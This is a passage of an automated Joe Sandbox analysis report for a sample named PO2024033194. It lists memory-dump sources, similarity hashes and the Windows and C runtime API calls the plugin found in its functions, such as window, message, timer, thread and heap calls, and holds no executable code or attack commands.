                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                  • String ID: #v
                                                                  • API String ID: 2449869053-554117064
                                                                  • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                  • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                  • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                  • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                  • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                  • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                  • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                  APIs
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Enable$Show$MessageMoveSend
                                                                  • String ID:
                                                                  • API String ID: 896007046-0
                                                                  • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                  • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                  • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                  • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                  • GetFocus.USER32 ref: 00448ACF
                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Enable$Show$FocusMessageSend
                                                                  • String ID:
                                                                  • API String ID: 3429747543-0
                                                                  • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                  • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                  • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                  • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                  APIs
                                                                    • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                    • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                    • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                  • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                  • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                  • String ID:
                                                                  • API String ID: 3300667738-0
                                                                  • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                  • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                  • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                  • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                  • __swprintf.LIBCMT ref: 0045D4E9
                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                  • String ID: %lu$\VH
                                                                  • API String ID: 3164766367-2432546070
                                                                  • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                  • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                  • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                  • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                  • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                  • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: Msctls_Progress32
                                                                  • API String ID: 3850602802-3636473452
                                                                  • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                  • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                  • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                  • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                  • String ID:
                                                                  • API String ID: 3985565216-0
                                                                  • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                  • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                  • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                  • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 0041F707
                                                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                  • _free.LIBCMT ref: 0041F71A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free_malloc
                                                                  • String ID: [B
                                                                  • API String ID: 1020059152-632041663
                                                                  • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                  • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                  • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                  • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                  APIs
                                                                  • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                  • __calloc_crt.LIBCMT ref: 00413DB0
                                                                  • __getptd.LIBCMT ref: 00413DBD
                                                                  • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                  • _free.LIBCMT ref: 00413E07
                                                                  • __dosmaperr.LIBCMT ref: 00413E12
                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                  • String ID:
                                                                  • API String ID: 155776804-0
                                                                  • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                  • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                  • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                  • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                  APIs
                                                                    • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                    • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                  • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                  • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                  • String ID:
                                                                  • API String ID: 1957940570-0
                                                                  • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                  • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                  • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                  • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                  APIs
                                                                  • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                  • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                  • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                  • ExitThread.KERNEL32 ref: 00413D4E
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                  • __freefls@4.LIBCMT ref: 00413D74
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                  • String ID:
                                                                  • API String ID: 259663610-0
                                                                  • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                  • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                  • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                  • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 004302E6
                                                                  • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                  • GetClientRect.USER32(?,?), ref: 00430364
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                  • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                  • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                  • String ID:
                                                                  • API String ID: 3220332590-0
                                                                  • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                  • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                  • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                  • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 1612042205-0
                                                                  • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                  • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                  • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                  • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove_strncmp
                                                                  • String ID: >$U$\
                                                                  • API String ID: 2666721431-237099441
                                                                  • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                  • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                  • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                  • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 0044C570
                                                                  • SetKeyboardState.USER32(00000080), ref: 0044C594
